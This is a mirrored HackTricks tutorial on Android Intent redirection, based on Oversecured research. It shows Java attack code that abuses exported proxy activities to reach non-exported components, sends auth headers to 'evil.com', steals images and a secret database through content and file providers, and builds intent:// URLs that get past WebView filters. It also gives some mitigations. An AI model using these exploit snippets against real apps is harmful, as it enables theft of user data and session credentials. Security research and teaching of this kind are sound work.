mirror of
https://github.com/carlospolop/hacktricks
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314 lines
16 KiB
Markdown
314 lines
16 KiB
Markdown
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<details>
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<summary><strong>Support HackTricks and get benefits!</strong></summary>
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- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
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- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
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- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
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- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
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- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
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</details>
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**Research taken from** [**https://blog.oversecured.com/Android-Access-to-app-protected-components/**](https://blog.oversecured.com/Android-Access-to-app-protected-components/)
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# Introduction
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This vulnerability resembles **Open Redirect in web security**. Since class `Intent` is `Parcelable`, **objects belonging to this class** can be **passed** as **extra** **data** in another `Intent` object. \
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Many developers make **use** of this **feature** and create **proxy** **components** (activities, broadcast receivers and services) that **take an embedded Intent and pass it to dangerous methods** like `startActivity(...)`, `sendBroadcast(...)`, etc. \
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This is dangerous because **an attacker can force the app to launch a non-exported component that cannot be launched directly from another app**, or to grant the attacker access to its content providers. **`WebView`** also sometimes changes a **URL from a string to an `Intent`** object, using the `Intent.parseUri(...)` method, and passes it to `startActivity(...)`.
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{% hint style="info" %}
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As summary: If an attacker can send an Intent that is being insecurely executed he can potentially access not exported components and abuse them.
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{% endhint %}
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# A typical case
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Let us examine an example. Fragment of the `AndroidManifest.xml` file
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```markup
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<activity android:name=".ProxyActivity" android:exported="true" />
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<activity android:name=".AuthWebViewActivity" android:exported="false" />
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```
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Activity `ProxyActivity`
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```java
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startActivity((Intent) getIntent().getParcelableExtra("extra_intent"));
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```
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Activity `AuthWebViewActivity`
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```java
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webView.loadUrl(getIntent().getStringExtra("url"), getAuthHeaders());
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```
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`AuthWebViewActivity` is an example of **hidden app functionality that performs certain unsafe actions**, in this case passing the user’s authentication session to a URL obtained from the `url` parameter.
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Export restrictions mean **the attacker cannot access `AuthWebViewActivity` directly**. A direct call
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```java
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Intent intent = new Intent();
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intent.setClassName("com.victim", "com.victim.AuthWebViewActivity");
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intent.putExtra("url", "http://evil.com/");
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startActivity(intent);
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```
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throws a `java.lang.SecurityException`, due to `Permission Denial`: `AuthWebViewActivity not exported from uid 1337`.
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But the attacker can f**orce the victim to launch `AuthWebViewActivity` itself**:
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```java
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Intent extra = new Intent();
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extra.setClassName("com.victim", "com.victim.AuthWebViewActivity");
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extra.putExtra("url", "http://evil.com/");
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Intent intent = new Intent();
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intent.setClassName("com.victim", "com.victim.ProxyActivity");
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intent.putExtra("extra_intent", extra);
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startActivity(intent);
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```
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and no security violation will arise, because t**he app that is under attack does have access to all its own components**. Using this code fragment, the attacker can bypass the Android system’s built-in restrictions.
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# Escalation of Impact
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In order to escalate the impact of this vulnerability you need to **find other vulns/missconfigurations that could allow to increate the impact of the vulnerability** (as the vulnerability by it's own isn't creating any risks).
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## Escalation of attacks via Content Providers
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Besides access to arbitrary components of the original app, the **attacker can attempt to gain access to those of the vulnerable app’s Content Providers** that satisfy the following conditions:
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* it must be **non-exported** (otherwise it **could be attacked directly**, without using the vulnerability we are discussing in this article)
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* it must have the **`android:grantUriPermissions`** flag set to **`true`**.
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* `android:grantUriPermissions="true"` indicates that your Java code can use `FLAG_GRANT_READ_URI_PERMISSION` and `FLAG_GRANT_WRITE_URI_PERMISSION` for **any `Uri` served by that `ContentProvider`**.
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* `android:grantUriPermissions="false"` indicates that **only the `Uri` values specified by child `<grant-uri-permission>`** elements can be used with `FLAG_GRANT_READ_URI_PERMISSION` and `FLAG_GRANT_WRITE_URI_PERMISSION`.
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The attacker must set itself as the recipient of an embedded intent and set the following flags
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* `Intent.FLAG_GRANT_PERSISTABLE_URI_PERMISSION` permits persistent access to the provider (without this flag, the access is one-time only)
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* `Intent.FLAG_GRANT_PREFIX_URI_PERMISSION` permits URI access by prefix – for example, instead of repeatedly obtaining separate access using a complete path such as `content://com.victim.provider/image/1` the attacker can grant access to all the provider’s content using the URI `content://com.victim.provider/` and then use `ContentResolver` to address `content://com.victim.provider/image/1`, `content://com.victim.provider/image/2`, etc.
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* `Intent.FLAG_GRANT_READ_URI_PERMISSION` permits read operations on the provider (such as `query`, `openFile`, `openAssetFile`)
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* `Intent.FLAG_GRANT_WRITE_URI_PERMISSION` permits write operations
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An example of a typical provider where an attacker can gain access to it and perform regular operations like `query`, `update`, `insert`, `delete`, `openFile`, `openAssetFile`
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```markup
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<provider android:name="com.victim.ContentProvider" android:exported="false" android:authorities="com.victim.provider" android:grantUriPermissions="true"/>
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```
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Example of the theft of user pictures `AndroidManifest.xml` file
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```markup
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<activity android:name=".LeakActivity" android:exported="true" />
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```
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`MainActivity.java` file
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```java
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Intent extra = new Intent();
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extra.setFlags(Intent.FLAG_GRANT_PERSISTABLE_URI_PERMISSION
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| Intent.FLAG_GRANT_PREFIX_URI_PERMISSION
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| Intent.FLAG_GRANT_READ_URI_PERMISSION
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| Intent.FLAG_GRANT_WRITE_URI_PERMISSION);
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extra.setClassName(getPackageName(), "com.attacker.LeakActivity");
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extra.setData(Uri.parse("content://com.victim.provider/"));
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Intent intent = new Intent();
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intent.setClassName("com.victim", "com.victim.ProxyActivity");
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intent.putExtra("extra_intent", extra);
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startActivity(intent);
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```
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`LeakActivity.java`
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```java
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Uri uri = Uri.parse(getIntent().getDataString() + "image/1")); // content://com.victim.provider/image/1
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Bitmap bitmap = BitmapFactory.decodeStream(getContentResolver().openInputStream(uri)); // stolen image
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```
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## Attacks on Android File Provider
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This vulnerability also makes it possible for the attacker to **steal app files** located in directories that the developer predetermined. For a successful attack, the malign app needs to **obtain access rights to Android File Provider and then read content from the file provider using Android ContentResolver**.
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Example file provider (for more details see [https://developer.android.com/reference/android/support/v4/content/FileProvider](https://developer.android.com/reference/android/support/v4/content/FileProvider))
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```markup
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<provider android:name="androidx.core.content.FileProvider" android:exported="false" android:authorities="com.victim.files_provider" android:grantUriPermissions="true">
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<meta-data android:name="android.support.FILE_PROVIDER_PATHS" android:resource="@xml/provider_paths"/>
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</provider>
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```
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It provides read/write access to files on a special list that can be found in the app resources, in this case at `res/xml/provider_paths.xml`
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It may look somewhat like
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```markup
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<?xml version="1.0" encoding="utf-8"?>
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<paths>
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<root-path name="root" path=""/>
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<files-path name="internal_files" path="."/>
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<cache-path name="cache" path=""/>
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<external-path name="external_files" path="images"/>
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</paths>
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```
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Each tag specifies a root directory with a `path` value relative to the root. For instance, the value `external_files` will correspond to `new File(Environment.getExternalStorageDirectory(), "images")`
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The value `root-path` corresponds to `/`, i.e. provides access to arbitrary files.
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Let us say we have some secret data stored in the file `/data/data/com.victim/databases/secret.db`: the theft of this file may look something like this `MainActivity.java`
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```java
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Intent extra = new Intent();
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extra.setFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION);
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extra.setClassName(getPackageName(), "com.attacker.LeakActivity");
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extra.setData(Uri.parse("content://com.victim.files_provider/root/data/data/com.victim/databases/secret.db"));
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Intent intent = new Intent();
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intent.setClassName("com.victim", "com.victim.ProxyActivity");
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intent.putExtra("extra_intent", extra);
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startActivity(intent);
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```
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`LeakActivity.java`
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```java
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InputStream i = getContentResolver().openInputStream(getIntent().getData()); // we can now do whatever we like with this stream, e.g. send it to a remote server
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```
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## Access to arbitrary components via WebView
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An Intent object can be cast to a string with a call to `Intent.toUri(flags)` and back from a string to an Intent using `Intent.parseUri(stringUri, flags)`. This functionality is often used in WebView (the app’s built-in browser): the **app can verify an `intent://` scheme, parse the URL into an Intent and launch the activity**.
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**This vulnerability can be exploited both via other vulnerabilities** (e.g. the ability to open arbitrary links in-app in WebView directly via exported activities or by way of the deeplink mechanism) in the client app and also remotely, including cross-site scripting on the server side or MitM on the client side
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Example of vulnerable code
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```java
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public boolean shouldOverrideUrlLoading(WebView view, WebResourceRequest request) {
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Uri uri = request.getUrl();
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if("intent".equals(uri.getScheme())) {
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startActivity(Intent.parseUri(uri.toString(), Intent.URI_INTENT_SCHEME));
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return true;
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}
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return super.shouldOverrideUrlLoading(view, request);
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}
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```
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The point here is that the `shouldOverrideUrlLoading(...)` method of class `WebViewClient` is called each time WebView tries to load a new link, but gives the app the option of adding a custom handler.
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To exploit this vulnerability the attacker needs to create a WebView redirect to a specially prepared intent-scheme URL. Example of URL creation
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```java
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Intent intent = new Intent();
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intent.setClassName("com.victim", "com.victim.AuthWebViewActivity");
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intent.putExtra("url", "http://evil.com/");
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Log.d("evil", intent.toUri(Intent.URI_INTENT_SCHEME)); // outputs "intent:#Intent;component=com.victim/.AuthWebViewActivity;S.url=http%3A%2F%2Fevil.com%2F;end"
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```
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Example attack
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```java
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location.href = "intent:#Intent;component=com.victim/.AuthWebViewActivity;S.url=http%3A%2F%2Fevil.com%2F;end";
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```
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This version contains **several restrictions compared to the classic versio**n of the vulnerability:
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* Embedded `Parcelable` and `Serializable` objects cannot be cast to string (they will be ignored)
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* The insecure flags `Intent.FLAG_GRANT_READ_URI_PERMISSION` and `Intent.FLAG_GRANT_WRITE_URI_PERMISSION` are **ignored** when `Intent.parseUri(...)` is called. The parser will only leave them if the `Intent.URI_ALLOW_UNSAFE` (`startActivity(Intent.parseUri(url, Intent.URI_INTENT_SCHEME | Intent.URI_ALLOW_UNSAFE))` flag is set, which is very rare
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Many developers still forget to carry out a complete filtering of intents received via WebView
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```java
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public boolean shouldOverrideUrlLoading(WebView view, WebResourceRequest request) {
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Uri uri = request.getUrl();
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if("intent".equals(uri.getScheme())) {
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Intent intent = Intent.parseUri(uri.toString(), Intent.URI_INTENT_SCHEME);
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intent.addCategory("android.intent.category.BROWSABLE");
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intent.setComponent(null);
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startActivity(intent);
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return true;
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}
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return super.shouldOverrideUrlLoading(view, request);
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}
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```
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The attacker can specify a non-exported component via a selector
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```java
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Intent intent = new Intent();
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intent.setSelector(new Intent().setClassName("com.victim", "com.victim.AuthWebViewActivity"));
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intent.putExtra("url", "http://evil.com/");
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Log.d("evil", intent.toUri(Intent.URI_INTENT_SCHEME)); // "intent:#Intent;S.url=http%3A%2F%2Fevil.com%2F;SEL;component=com.victim/.AuthWebViewActivity;end"
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```
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And bypass the app’s protection against explicit intents. We therefore recommend filtering the selector as well
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```java
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intent.addCategory("android.intent.category.BROWSABLE");
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intent.setComponent(null);
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intent.setSelector(null);
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```
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But even complete filtering does not guarantee complete protection, because an attacker can create an implicit intent corresponding to the `intent-filter` of some non-exported activity. Example of an activity declaration:
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```markup
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<activity android:name=".AuthWebViewActivity" android:exported="false">
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<intent-filter>
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<action android:name="android.intent.action.VIEW" />
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<category android:name="android.intent.category.DEFAULT" />
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<data android:scheme="victim" android:host="secure_handler" />
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</intent-filter>
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</activity>
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```
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```java
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webView.loadUrl(getIntent().getData().getQueryParameter("url"), getAuthHeaders());
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```
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We therefore recommend checking that an activity is exported before it is launched.
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## Other ways of creating insecure intents
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Some app developers implement their **own intent parsers** (often to handle **deeplinks** or push messages), using e.g. **JSON** objects, strings or byte arrays, which either do not differ from the default or else present a great danger, because they may expand **`Serializable`** and `Parcelable` objects and they also allow insecure flags to be set. The security researcher may also encounter more exotic versions of intent creation, such as casting a byte array to a `Parcel` and then reading an intent from it
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```java
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Uri deeplinkUri = getIntent().getData();
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if(deeplinkUri.toString().startsWith("deeplink://handle/")) {
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byte[] handle = Base64.decode(deeplinkUri.getQueryParameter("param"), 0);
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Parcel parcel = Parcel.obtain();
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parcel.unmarshall(handle, 0, handle.length);
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startActivity((Intent) parcel.readParcelable(getClassLoader()));
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}
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```
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# Vuln app
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{% embed url="https://github.com/oversecured/ovaa" %}
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<details>
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<summary><strong>Support HackTricks and get benefits!</strong></summary>
|
||
|
||
- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||
|
||
- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||
|
||
- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||
|
||
- **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
||
|
||
- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.**
|
||
|
||
</details>
|
||
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